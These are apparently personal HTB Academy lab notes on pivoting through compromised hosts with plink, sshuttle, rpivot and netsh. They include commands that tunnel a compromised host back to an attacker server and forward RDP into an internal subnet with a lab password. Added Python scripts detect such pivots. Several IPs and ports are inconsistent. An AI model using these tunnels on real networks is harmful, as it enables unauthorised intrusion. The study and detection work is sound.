Pivoting around obstacles

Notes from HTB academy, and general trial and error

SSH for Windows: Plink.exe

  • is a Windows command-line SSH tool

  • can be used to create dynamic port forwards and SOCKS proxies

example

To start a dynamic port forward over the Ubuntu server (pivot point), start an SSH session between the attacking host (Windows) and the pivot point (Ubuntu):

plink -ssh -D 9050 ubuntu@10.129.15.50

Proxifier

  • Another Windows based tool

  • can be used to start a SOCKS tunnel via the SSH session we have created

  • Proxifier creates a tunneled network for desktop client applications and allows them to operate through SOCKS and HTTPS proxies

SSH pivoting with sshuttle

  • written in python

  • removes the need to configure proxychains

  • only works for pivoting over SSH and does not offer other options for pivoting over HTTPS or Tor servers

example

sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23

  • -r: connects to the remote machine (the pivot host) with the given username and password

  • we also need to include the network or IP we want to route through the pivot host; in our case this is the internal subnet 172.16.5.0/23

In this example:

  • sshuttle creates an entry in our iptables rules to redirect all traffic for the 172.16.5.0/23 network through our pivot host

Traffic routing through iptables Routes

We can run tools such as nmap directly, for example:

nmap -v -sV -p3389 172.16.5.19 -A -Pn

All of our traffic to the internal network is routed through the pivot without the use of proxychains.
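Because sshuttle works by inserting NAT rules on the machine that runs it rather than by proxying each tool, the pivot leaves a visible trace in that machine's iptables NAT table. The Python script below is an added example and is not part of these notes or of the sshuttle project: it parses the output of `iptables -t nat -S` and reports REDIRECT rules that capture traffic for a watched subnet, which is how an administrator would confirm (or notice) that a subnet is being hijacked into a local listener. The sample rules are constructed for this example, with the chain name modelled on sshuttle's `sshuttle-<port>` convention; the function names are assumptions of mine, not sshuttle's.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `iptables -t nat -S` output on a host that is running
# sshuttle towards 172.16.5.0/23. The chain name follows sshuttle's
# "sshuttle-<port>" convention; every line here was written for this example.
# 172.16.5.0/23 has host bits set, so the sample shows it in its masked form
# 172.16.4.0/23; the parser uses strict=False so both spellings match.
SAMPLE_NAT_RULES = """\
-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-N sshuttle-12300
-A PREROUTING -j sshuttle-12300
-A OUTPUT -j sshuttle-12300
-A sshuttle-12300 -d 127.0.0.0/8 -p tcp -j RETURN
-A sshuttle-12300 -d 172.16.4.0/23 -p tcp -j REDIRECT --to-ports 12300
"""


@dataclass(frozen=True)
class RedirectRule:
    chain: str
    destination: ipaddress.IPv4Network
    protocol: Optional[str]
    to_port: int


def _option(tokens: List[str], flag: str) -> Optional[str]:
    """Return the value that follows `flag` in a tokenised iptables rule, if any."""
    if flag in tokens:
        idx = tokens.index(flag)
        if idx + 1 < len(tokens):
            return tokens[idx + 1]
    return None


def parse_redirect_rules(text: str) -> List[RedirectRule]:
    """Pick out the `-A <chain> ... -j REDIRECT --to-ports N` rules from `iptables -S` output."""
    rules = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or tokens[0] != "-A":
            continue  # policies (-P) and chain definitions (-N) are not rules
        if _option(tokens, "-j") != "REDIRECT":
            continue  # RETURN / jump-to-chain rules do not capture traffic
        dst = _option(tokens, "-d") or "0.0.0.0/0"  # no -d means any destination
        port = _option(tokens, "--to-ports")
        if port is None:
            continue
        rules.append(RedirectRule(
            chain=tokens[1],
            destination=ipaddress.ip_network(dst, strict=False),
            protocol=_option(tokens, "-p"),
            to_port=int(port.split("-")[0]),  # "--to-ports 12300-12310" -> 12300
        ))
    return rules


def find_redirected_networks(text: str, watched: List[str]) -> List[RedirectRule]:
    """Return the redirect rules whose destination overlaps any watched network."""
    nets = [ipaddress.ip_network(n, strict=False) for n in watched]
    return [r for r in parse_redirect_rules(text)
            if any(r.destination.overlaps(n) for n in nets)]


if __name__ == "__main__":
    # Usage: on a live host, replace SAMPLE_NAT_RULES with the real output of
    # `sudo iptables -t nat -S` and list the subnets you care about.
    for rule in find_redirected_networks(SAMPLE_NAT_RULES, ["172.16.5.0/23"]):
        print(f"{rule.chain}: {rule.destination} ({rule.protocol}) -> local port {rule.to_port}")
```

On the sample, the script reports the single `sshuttle-12300` rule sending TCP for 172.16.4.0/23 to local port 12300; the RETURN rule for loopback and the jump rules in PREROUTING and OUTPUT are ignored because they do not redirect anything.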

Web Server Pivoting with Rpivot

  • Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling

  • Rpivot binds a machine that resides within a corporate network to an external server and exposes the client's local port server-side

sudo git clone https://github.com/klsecservices/rpivot.git

example

  • we have a web server within the internal network (172.16.5.153), and we want to access the web server using the pivot point (Ubuntu server) and the rpivot proxy

Let's start our rpivot SOCKS proxy server in preparation for connecting to our client on the compromised Ubuntu server (pivot host), using server.py:

sudo python2.7 /opt/rpivot/server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Let's transfer rpivot over to the pivot host (Ubuntu server):

sudo scp -r /opt/rpivot ubuntu@10.129.37.7:/home/ubuntu/ 

Now we can run client.py from our pivot host to connect back to our server:

python2.7 client.py --server-ip 10.10.14.121 --server-port 9999

  • we should see a connection established in the server prompt

Now we will configure proxychains to pivot over the SOCKS listener on 127.0.0.1:9050 on our local machine, which was initially started by server.py.

Now I did have a problem trying to use Firefox through proxychains, but curl worked:

proxychains curl -X GET http://172.16.5.135

Port Forwarding with Windows Netsh

  • Netsh is a Windows command-line tool that can help with the network configuration of a particular Windows system

  • examples of what netsh can do are:

  1. Finding routes

  2. Viewing the firewall configuration

  3. Adding proxies

  4. Creating Port Forwarding rules

example

We can see from the diagram that we have compromised the Windows 10 user workstation (10.129.15.150).

  • Now we want a way to communicate with the Windows server within the 172.16.5.0/23 subnet. How can we do this?

  • we can use netsh.exe to forward all data received on a specific port, say 8080 (10.129.15.150), to a remote host on a remote port, 3389 (172.16.5.25); this can be performed by the following command on the pivot host (10.129.15.19):

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

  • interface portproxy add v4tov4: adds a new IPv4-to-IPv4 port proxy entry

  • listenport=8080: specifies the port on which the proxy will listen for incoming connections (on our pivot host)

  • listenaddress=10.129.15.150: specifies the IP address on which the proxy will listen for incoming connections

  • connectport=3389: specifies the port to which the proxy will forward the incoming connections

  • connectaddress=172.16.5.25: specifies the IP address to which the proxy will forward the incoming connections

We can verify that the port proxy rule is in place with:

netsh.exe interface portproxy show v4tov4
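A netsh port proxy is a persistent, host-level forward that survives reboots, so the same `show v4tov4` output is one of the first things a defender inspects on a suspected pivot host. The Python script below is an added example, not part of these notes or of netsh: it parses the output of `netsh interface portproxy show v4tov4` and flags any rule that forwards into a network the host does not itself sit on, which is exactly the cross-subnet pattern set up above. The sample output is constructed for this example (its first row is the rule from these notes, the second a benign local forward), and the function names and the 10.129.0.0/16 "local network" used in the usage are assumptions of mine.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

# Constructed sample of `netsh interface portproxy show v4tov4` output.
# Row 1 is the forward from these notes (workstation -> internal server RDP);
# row 2 is a benign forward to a local service, added so the filter has
# something it should leave alone.
SAMPLE_PORTPROXY = """\

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.25     3389
*               4443        127.0.0.1       443
"""


@dataclass(frozen=True)
class PortProxyRule:
    listen_address: str
    listen_port: int
    connect_address: str
    connect_port: int


def parse_portproxy(text: str) -> List[PortProxyRule]:
    """Turn the netsh table into rules. Header, blank and separator lines are
    skipped because their second and fourth columns are not numeric."""
    rules = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) != 4 or not (tokens[1].isdigit() and tokens[3].isdigit()):
            continue
        rules.append(PortProxyRule(tokens[0], int(tokens[1]), tokens[2], int(tokens[3])))
    return rules


def flag_pivot_rules(rules: List[PortProxyRule], local_networks: List[str]) -> List[PortProxyRule]:
    """Return rules whose connect address lies outside the host's own networks.
    Loopback targets are treated as benign; anything forwarded into a subnet the
    host is not on is the pivoting pattern and is worth a closer look."""
    nets = [ipaddress.ip_network(n, strict=False) for n in local_networks]
    flagged = []
    for rule in rules:
        target = ipaddress.ip_address(rule.connect_address)
        if target.is_loopback:
            continue
        if not any(target in net for net in nets):
            flagged.append(rule)
    return flagged


if __name__ == "__main__":
    # Usage: on the host itself, replace SAMPLE_PORTPROXY with the real output
    # of `netsh interface portproxy show v4tov4` and list the host's own subnets.
    for rule in flag_pivot_rules(parse_portproxy(SAMPLE_PORTPROXY), ["10.129.0.0/16"]):
        print(f"{rule.listen_address}:{rule.listen_port} -> "
              f"{rule.connect_address}:{rule.connect_port} forwards outside the local network")
```

With the sample, only the 8080 -> 172.16.5.25:3389 rule is flagged; the 4443 -> 127.0.0.1:443 forward stays quiet because its target is loopback. If the host genuinely has an interface in 172.16.4.0/23, adding that network to the local list clears the finding, which is the check a practitioner should make before treating a flagged rule as a pivot.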

Now we should be able to RDP into the server through the forward:

xfreerdp /u:victor /p:pass@123 /v:10.129.42.198:9000
